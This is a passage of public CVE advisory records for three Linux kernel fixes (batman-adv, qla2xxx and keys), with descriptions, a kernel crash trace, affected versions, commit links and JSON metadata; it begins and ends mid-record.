          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbatman-adv: Avoid infinite loop trying to resize local TT\n\nIf the MTU of one of an attached interface becomes too small to transmit\nthe local translation table then it must be resized to fit inside all\nfragments (when enabled) or a single packet.\n\nBut if the MTU becomes too low to transmit even the header + the VLAN\nspecific part then the resizing of the local TT will never succeed. This\ncan for example happen when the usable space is 110 bytes and 11 VLANs are\non top of batman-adv. In this case, at least 116 byte would be needed.\nThere will just be an endless spam of\n\n   batman_adv: batadv0: Forced to purge local tt entries to fit new maximum fragment MTU (110)\n\nin the log but the function will never finish. Problem here is that the\ntimeout will be halved all the time and will then stagnate at 0 and\ntherefore never be able to reduce the table even more.\n\nThere are other scenarios possible with a similar result. The number of\nBATADV_TT_CLIENT_NOPURGE entries in the local TT can for example be too\nhigh to fit inside a packet. Such a scenario can therefore happen also with\nonly a single VLAN + 7 non-purgable addresses - requiring at least 120\nbytes.\n\nWhile this should be handled proactively when:\n\n* interface with too low MTU is added\n* VLAN is added\n* non-purgeable local mac is added\n* MTU of an attached interface is reduced\n* fragmentation setting gets disabled (which most likely requires dropping\n  attached interfaces)\n\nnot all of these scenarios can be prevented because batman-adv is only\nconsuming events without the the possibility to prevent these actions\n(non-purgable MAC address added, MTU of an attached interface is reduced).\nIt is therefore necessary to also make sure that the code is able to handle\nalso the situations when there were already incompatible system\nconfiguration are present."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:09:48.633Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/04720ea2e6c64459a90ca28570ea78335eccd924"
        },
        {
          "url": "https://git.kernel.org/stable/c/b3ddf6904073990492454b1dd1c10a24be8c74c6"
        },
        {
          "url": "https://git.kernel.org/stable/c/70a8be9dc2fb65d67f8c1e0c88c587e08e2e575d"
        },
        {
          "url": "https://git.kernel.org/stable/c/87b6af1a7683e021710c08fc0551fc078346032f"
        },
        {
          "url": "https://git.kernel.org/stable/c/3fe79b2c83461edbbf86ed8a6f3924820ff89259"
        },
        {
          "url": "https://git.kernel.org/stable/c/4ca2a5fb54ea2cc43edea614207fcede562d91c2"
        },
        {
          "url": "https://git.kernel.org/stable/c/ca54e2671548616ad34885f90d4f26f7adb088f0"
        },
        {
          "url": "https://git.kernel.org/stable/c/b1f532a3b1e6d2e5559c7ace49322922637a28aa"
        }
      ],
      "title": "batman-adv: Avoid infinite loop trying to resize local TT",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35982",
    "datePublished": "2024-05-20T09:42:06.397Z",
    "dateReserved": "2024-05-17T13:50:33.144Z",
    "dateUpdated": "2025-05-04T09:09:48.633Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26931 (GCVE-0-2024-26931)

Vulnerability from cvelistv5 – Published: 2024-05-01 05:17 – Updated: 2026-01-05 10:35

Title

scsi: qla2xxx: Fix command flush on cable pull

Summary

In the Linux kernel, the following vulnerability has been resolved: scsi: qla2xxx: Fix command flush on cable pull System crash due to command failed to flush back to SCSI layer. BUG: unable to handle kernel NULL pointer dereference at 0000000000000000 PGD 0 P4D 0 Oops: 0000 [#1] SMP NOPTI CPU: 27 PID: 793455 Comm: kworker/u130:6 Kdump: loaded Tainted: G OE --------- - - 4.18.0-372.9.1.el8.x86_64 #1 Hardware name: HPE ProLiant DL360 Gen10/ProLiant DL360 Gen10, BIOS U32 09/03/2021 Workqueue: nvme-wq nvme_fc_connect_ctrl_work [nvme_fc] RIP: 0010:__wake_up_common+0x4c/0x190 Code: 24 10 4d 85 c9 74 0a 41 f6 01 04 0f 85 9d 00 00 00 48 8b 43 08 48 83 c3 08 4c 8d 48 e8 49 8d 41 18 48 39 c3 0f 84 f0 00 00 00 <49> 8b 41 18 89 54 24 08 31 ed 4c 8d 70 e8 45 8b 29 41 f6 c5 04 75 RSP: 0018:ffff95f3e0cb7cd0 EFLAGS: 00010086 RAX: 0000000000000000 RBX: ffff8b08d3b26328 RCX: 0000000000000000 RDX: 0000000000000001 RSI: 0000000000000003 RDI: ffff8b08d3b26320 RBP: 0000000000000001 R08: 0000000000000000 R09: ffffffffffffffe8 R10: 0000000000000000 R11: ffff95f3e0cb7a60 R12: ffff95f3e0cb7d20 R13: 0000000000000003 R14: 0000000000000000 R15: 0000000000000000 FS: 0000000000000000(0000) GS:ffff8b2fdf6c0000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000000000000 CR3: 0000002f1e410002 CR4: 00000000007706e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 PKRU: 55555554 Call Trace: __wake_up_common_lock+0x7c/0xc0 qla_nvme_ls_req+0x355/0x4c0 [qla2xxx] qla2xxx [0000:12:00.1]-f084:3: qlt_free_session_done: se_sess 0000000000000000 / sess ffff8ae1407ca000 from port 21:32:00:02:ac:07:ee:b8 loop_id 0x02 s_id 01:02:00 logout 1 keep 0 els_logo 0 ? __nvme_fc_send_ls_req+0x260/0x380 [nvme_fc] qla2xxx [0000:12:00.1]-207d:3: FCPort 21:32:00:02:ac:07:ee:b8 state transitioned from ONLINE to LOST - portid=010200. ? nvme_fc_send_ls_req.constprop.42+0x1a/0x45 [nvme_fc] qla2xxx [0000:12:00.1]-2109:3: qla2x00_schedule_rport_del 21320002ac07eeb8. rport ffff8ae598122000 roles 1 ? nvme_fc_connect_ctrl_work.cold.63+0x1e3/0xa7d [nvme_fc] qla2xxx [0000:12:00.1]-f084:3: qlt_free_session_done: se_sess 0000000000000000 / sess ffff8ae14801e000 from port 21:32:01:02:ad:f7:ee:b8 loop_id 0x04 s_id 01:02:01 logout 1 keep 0 els_logo 0 ? __switch_to+0x10c/0x450 ? process_one_work+0x1a7/0x360 qla2xxx [0000:12:00.1]-207d:3: FCPort 21:32:01:02:ad:f7:ee:b8 state transitioned from ONLINE to LOST - portid=010201. ? worker_thread+0x1ce/0x390 ? create_worker+0x1a0/0x1a0 qla2xxx [0000:12:00.1]-2109:3: qla2x00_schedule_rport_del 21320102adf7eeb8. rport ffff8ae3b2312800 roles 70 ? kthread+0x10a/0x120 qla2xxx [0000:12:00.1]-2112:3: qla_nvme_unregister_remote_port: unregister remoteport on ffff8ae14801e000 21320102adf7eeb8 ? set_kthread_struct+0x40/0x40 qla2xxx [0000:12:00.1]-2110:3: remoteport_delete of ffff8ae14801e000 21320102adf7eeb8 completed. ? ret_from_fork+0x1f/0x40 qla2xxx [0000:12:00.1]-f086:3: qlt_free_session_done: waiting for sess ffff8ae14801e000 logout The system was under memory stress where driver was not able to allocate an SRB to carry out error recovery of cable pull. The failure to flush causes upper layer to start modifying scsi_cmnd. When the system frees up some memory, the subsequent cable pull trigger another command flush. At this point the driver access a null pointer when attempting to DMA unmap the SGL. Add a check to make sure commands are flush back on session tear down to prevent the null pointer access.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/b73377124f56d2fec…
	https://git.kernel.org/stable/c/d7a68eee87b05d4e2…
	https://git.kernel.org/stable/c/67b2d35853c2da25a…
	https://git.kernel.org/stable/c/a859f6a8f4234b8ef…
	https://git.kernel.org/stable/c/09c0ac18cac206ed1…
	https://git.kernel.org/stable/c/8de1584ec4fe0ebea…
	https://git.kernel.org/stable/c/8f0d32004e3a572bb…
	https://git.kernel.org/stable/c/ec7587eef003cab15…
	https://git.kernel.org/stable/c/a27d4d0e7de305def…

Impacted products

Vendor

Product

Version

Linux

Affected: 726b85487067d7f5b23495bc33c484b8517c4074 , < b73377124f56d2fec154737c2f8d2e839c237d5a (git)
Affected: 726b85487067d7f5b23495bc33c484b8517c4074 , < d7a68eee87b05d4e29419e6f151aef99314970a9 (git)
Affected: 726b85487067d7f5b23495bc33c484b8517c4074 , < 67b2d35853c2da25a8ca1c4190a5e96d3083c2ac (git)
Affected: 726b85487067d7f5b23495bc33c484b8517c4074 , < a859f6a8f4234b8ef62862bf7a92f1af5f8cd47a (git)
Affected: 726b85487067d7f5b23495bc33c484b8517c4074 , < 09c0ac18cac206ed1218b1fe6c1a0918e5ea9211 (git)
Affected: 726b85487067d7f5b23495bc33c484b8517c4074 , < 8de1584ec4fe0ebea33c273036e7e0a05e65c81d (git)
Affected: 726b85487067d7f5b23495bc33c484b8517c4074 , < 8f0d32004e3a572bb77e6c11c2797c87f8c9703d (git)
Affected: 726b85487067d7f5b23495bc33c484b8517c4074 , < ec7587eef003cab15a13446d67c3adb88146a150 (git)
Affected: 726b85487067d7f5b23495bc33c484b8517c4074 , < a27d4d0e7de305def8a5098a614053be208d1aa1 (git)

Linux

Affected: 4.11
Unaffected: 0 , < 4.11 (semver)
Unaffected: 4.19.312 , ≤ 4.19.* (semver)
Unaffected: 5.4.274 , ≤ 5.4.* (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.154 , ≤ 5.15.* (semver)
Unaffected: 6.1.84 , ≤ 6.1.* (semver)
Unaffected: 6.6.24 , ≤ 6.6.* (semver)
Unaffected: 6.7.12 , ≤ 6.7.* (semver)
Unaffected: 6.8.3 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:21:05.629Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b73377124f56d2fec154737c2f8d2e839c237d5a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d7a68eee87b05d4e29419e6f151aef99314970a9"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/67b2d35853c2da25a8ca1c4190a5e96d3083c2ac"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a859f6a8f4234b8ef62862bf7a92f1af5f8cd47a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/09c0ac18cac206ed1218b1fe6c1a0918e5ea9211"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8de1584ec4fe0ebea33c273036e7e0a05e65c81d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8f0d32004e3a572bb77e6c11c2797c87f8c9703d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ec7587eef003cab15a13446d67c3adb88146a150"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a27d4d0e7de305def8a5098a614053be208d1aa1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26931",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:45:55.384223Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:53.290Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/scsi/qla2xxx/qla_target.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "b73377124f56d2fec154737c2f8d2e839c237d5a",
              "status": "affected",
              "version": "726b85487067d7f5b23495bc33c484b8517c4074",
              "versionType": "git"
            },
            {
              "lessThan": "d7a68eee87b05d4e29419e6f151aef99314970a9",
              "status": "affected",
              "version": "726b85487067d7f5b23495bc33c484b8517c4074",
              "versionType": "git"
            },
            {
              "lessThan": "67b2d35853c2da25a8ca1c4190a5e96d3083c2ac",
              "status": "affected",
              "version": "726b85487067d7f5b23495bc33c484b8517c4074",
              "versionType": "git"
            },
            {
              "lessThan": "a859f6a8f4234b8ef62862bf7a92f1af5f8cd47a",
              "status": "affected",
              "version": "726b85487067d7f5b23495bc33c484b8517c4074",
              "versionType": "git"
            },
            {
              "lessThan": "09c0ac18cac206ed1218b1fe6c1a0918e5ea9211",
              "status": "affected",
              "version": "726b85487067d7f5b23495bc33c484b8517c4074",
              "versionType": "git"
            },
            {
              "lessThan": "8de1584ec4fe0ebea33c273036e7e0a05e65c81d",
              "status": "affected",
              "version": "726b85487067d7f5b23495bc33c484b8517c4074",
              "versionType": "git"
            },
            {
              "lessThan": "8f0d32004e3a572bb77e6c11c2797c87f8c9703d",
              "status": "affected",
              "version": "726b85487067d7f5b23495bc33c484b8517c4074",
              "versionType": "git"
            },
            {
              "lessThan": "ec7587eef003cab15a13446d67c3adb88146a150",
              "status": "affected",
              "version": "726b85487067d7f5b23495bc33c484b8517c4074",
              "versionType": "git"
            },
            {
              "lessThan": "a27d4d0e7de305def8a5098a614053be208d1aa1",
              "status": "affected",
              "version": "726b85487067d7f5b23495bc33c484b8517c4074",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/scsi/qla2xxx/qla_target.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.11"
            },
            {
              "lessThan": "4.11",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.312",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.274",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.154",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.84",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.24",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.312",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.274",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.154",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.84",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.24",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.12",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.3",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: qla2xxx: Fix command flush on cable pull\n\nSystem crash due to command failed to flush back to SCSI layer.\n\n BUG: unable to handle kernel NULL pointer dereference at 0000000000000000\n PGD 0 P4D 0\n Oops: 0000 [#1] SMP NOPTI\n CPU: 27 PID: 793455 Comm: kworker/u130:6 Kdump: loaded Tainted: G           OE    --------- -  - 4.18.0-372.9.1.el8.x86_64 #1\n Hardware name: HPE ProLiant DL360 Gen10/ProLiant DL360 Gen10, BIOS U32 09/03/2021\n Workqueue: nvme-wq nvme_fc_connect_ctrl_work [nvme_fc]\n RIP: 0010:__wake_up_common+0x4c/0x190\n Code: 24 10 4d 85 c9 74 0a 41 f6 01 04 0f 85 9d 00 00 00 48 8b 43 08 48 83 c3 08 4c 8d 48 e8 49 8d 41 18 48 39 c3 0f 84 f0 00 00 00 \u003c49\u003e 8b 41 18 89 54 24 08 31 ed 4c 8d 70 e8 45 8b 29 41 f6 c5 04 75\n RSP: 0018:ffff95f3e0cb7cd0 EFLAGS: 00010086\n RAX: 0000000000000000 RBX: ffff8b08d3b26328 RCX: 0000000000000000\n RDX: 0000000000000001 RSI: 0000000000000003 RDI: ffff8b08d3b26320\n RBP: 0000000000000001 R08: 0000000000000000 R09: ffffffffffffffe8\n R10: 0000000000000000 R11: ffff95f3e0cb7a60 R12: ffff95f3e0cb7d20\n R13: 0000000000000003 R14: 0000000000000000 R15: 0000000000000000\n FS:  0000000000000000(0000) GS:ffff8b2fdf6c0000(0000) knlGS:0000000000000000\n CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000000000000000 CR3: 0000002f1e410002 CR4: 00000000007706e0\n DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n PKRU: 55555554\n Call Trace:\n  __wake_up_common_lock+0x7c/0xc0\n  qla_nvme_ls_req+0x355/0x4c0 [qla2xxx]\n qla2xxx [0000:12:00.1]-f084:3: qlt_free_session_done: se_sess 0000000000000000 / sess ffff8ae1407ca000 from port 21:32:00:02:ac:07:ee:b8 loop_id 0x02 s_id 01:02:00 logout 1 keep 0 els_logo 0\n ? __nvme_fc_send_ls_req+0x260/0x380 [nvme_fc]\n qla2xxx [0000:12:00.1]-207d:3: FCPort 21:32:00:02:ac:07:ee:b8 state transitioned from ONLINE to LOST - portid=010200.\n  ? nvme_fc_send_ls_req.constprop.42+0x1a/0x45 [nvme_fc]\n qla2xxx [0000:12:00.1]-2109:3: qla2x00_schedule_rport_del 21320002ac07eeb8. rport ffff8ae598122000 roles 1\n ? nvme_fc_connect_ctrl_work.cold.63+0x1e3/0xa7d [nvme_fc]\n qla2xxx [0000:12:00.1]-f084:3: qlt_free_session_done: se_sess 0000000000000000 / sess ffff8ae14801e000 from port 21:32:01:02:ad:f7:ee:b8 loop_id 0x04 s_id 01:02:01 logout 1 keep 0 els_logo 0\n  ? __switch_to+0x10c/0x450\n ? process_one_work+0x1a7/0x360\n qla2xxx [0000:12:00.1]-207d:3: FCPort 21:32:01:02:ad:f7:ee:b8 state transitioned from ONLINE to LOST - portid=010201.\n  ? worker_thread+0x1ce/0x390\n  ? create_worker+0x1a0/0x1a0\n qla2xxx [0000:12:00.1]-2109:3: qla2x00_schedule_rport_del 21320102adf7eeb8. rport ffff8ae3b2312800 roles 70\n  ? kthread+0x10a/0x120\n qla2xxx [0000:12:00.1]-2112:3: qla_nvme_unregister_remote_port: unregister remoteport on ffff8ae14801e000 21320102adf7eeb8\n  ? set_kthread_struct+0x40/0x40\n qla2xxx [0000:12:00.1]-2110:3: remoteport_delete of ffff8ae14801e000 21320102adf7eeb8 completed.\n  ? ret_from_fork+0x1f/0x40\n qla2xxx [0000:12:00.1]-f086:3: qlt_free_session_done: waiting for sess ffff8ae14801e000 logout\n\nThe system was under memory stress where driver was not able to allocate an\nSRB to carry out error recovery of cable pull.  The failure to flush causes\nupper layer to start modifying scsi_cmnd.  When the system frees up some\nmemory, the subsequent cable pull trigger another command flush. At this\npoint the driver access a null pointer when attempting to DMA unmap the\nSGL.\n\nAdd a check to make sure commands are flush back on session tear down to\nprevent the null pointer access."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:35:02.675Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/b73377124f56d2fec154737c2f8d2e839c237d5a"
        },
        {
          "url": "https://git.kernel.org/stable/c/d7a68eee87b05d4e29419e6f151aef99314970a9"
        },
        {
          "url": "https://git.kernel.org/stable/c/67b2d35853c2da25a8ca1c4190a5e96d3083c2ac"
        },
        {
          "url": "https://git.kernel.org/stable/c/a859f6a8f4234b8ef62862bf7a92f1af5f8cd47a"
        },
        {
          "url": "https://git.kernel.org/stable/c/09c0ac18cac206ed1218b1fe6c1a0918e5ea9211"
        },
        {
          "url": "https://git.kernel.org/stable/c/8de1584ec4fe0ebea33c273036e7e0a05e65c81d"
        },
        {
          "url": "https://git.kernel.org/stable/c/8f0d32004e3a572bb77e6c11c2797c87f8c9703d"
        },
        {
          "url": "https://git.kernel.org/stable/c/ec7587eef003cab15a13446d67c3adb88146a150"
        },
        {
          "url": "https://git.kernel.org/stable/c/a27d4d0e7de305def8a5098a614053be208d1aa1"
        }
      ],
      "title": "scsi: qla2xxx: Fix command flush on cable pull",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26931",
    "datePublished": "2024-05-01T05:17:14.823Z",
    "dateReserved": "2024-02-19T14:20:24.195Z",
    "dateUpdated": "2026-01-05T10:35:02.675Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-36031 (GCVE-0-2024-36031)

Vulnerability from cvelistv5 – Published: 2024-05-30 15:23 – Updated: 2025-11-04 17:20

Title

keys: Fix overwrite of key expiration on instantiation

Summary

In the Linux kernel, the following vulnerability has been resolved: keys: Fix overwrite of key expiration on instantiation The expiry time of a key is unconditionally overwritten during instantiation, defaulting to turn it permanent. This causes a problem for DNS resolution as the expiration set by user-space is overwritten to TIME64_MAX, disabling further DNS updates. Fix this by restoring the condition that key_set_expiry is only called when the pre-parser sets a specific expiry.

Severity ?

9.8 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-324 - Use of a Key Past its Expiration Date

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/ad2011ea787928b2a…
	https://git.kernel.org/stable/c/ed79b93f725cd0da3…
	https://git.kernel.org/stable/c/e4519a016650e952a…
	https://git.kernel.org/stable/c/25777f3f4e1f371d1…
	https://git.kernel.org/stable/c/939a08bcd4334bad4…
	https://git.kernel.org/stable/c/cc219cb8afbc40ec1…
	https://git.kernel.org/stable/c/9da27fb65a14c18ef…

Impacted products

Vendor

Product

Version

Linux

Affected: 97be1e865e70e5a0ad0a5b5f5dca5031ca0b53ac , < ad2011ea787928b2accb5134f1e423b11fe80a8a (git)
Affected: 2552b32b0b349df160a509fe49f5f308cb922f2b , < ed79b93f725cd0da39a265dc23d77add1527b9be (git)
Affected: 791d5409cdb974c31a1bc7a903ea729ddc7d83df , < e4519a016650e952ad9eb27937f8c447d5a4e06d (git)
Affected: afc360e8a1256acb7579a6f5b6f2c30b85b39301 , < 25777f3f4e1f371d16a594925f31e37ce07b6ec7 (git)
Affected: 39299bdd2546688d92ed9db4948f6219ca1b9542 , < 939a08bcd4334bad4b201e60bd0ae1f278d71d41 (git)
Affected: 39299bdd2546688d92ed9db4948f6219ca1b9542 , < cc219cb8afbc40ec100c0de941047bb29373126a (git)
Affected: 39299bdd2546688d92ed9db4948f6219ca1b9542 , < 9da27fb65a14c18efd4473e2e82b76b53ba60252 (git)

Linux

Affected: 6.7
Unaffected: 0 , < 6.7 (semver)
Unaffected: 5.10.217 , ≤ 5.10.* (semver)
Unaffected: 5.15.159 , ≤ 5.15.* (semver)
Unaffected: 6.1.91 , ≤ 6.1.* (semver)
Unaffected: 6.6.31 , ≤ 6.6.* (semver)
Unaffected: 6.8.10 , ≤ 6.8.* (semver)
Unaffected: 6.9.1 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "ad2011ea7879",
                "status": "affected",
                "version": "97be1e865e70",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "ed79b93f725c",
                "status": "affected",
                "version": "2552b32b0b34",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "e4519a016650",
                "status": "affected",
                "version": "791d5409cdb9",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "25777f3f4e1f",
                "status": "affected",
                "version": "afc360e8a125",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "939a08bcd433",
                "status": "affected",
                "version": "39299bdd2546",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "cc219cb8afbc",
                "status": "affected",
                "version": "39299bdd2546",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "9da27fb65a14",
                "status": "affected",
                "version": "39299bdd2546",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThanOrEqual": "6.6.*",
                "status": "unaffected",
                "version": "6.6.31",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "6.7",
                "status": "unaffected",
                "version": "0",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:6.7:-:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "affected",
                "version": "6.7"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "5.11",
                "status": "unaffected",
                "version": "5.10.217",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
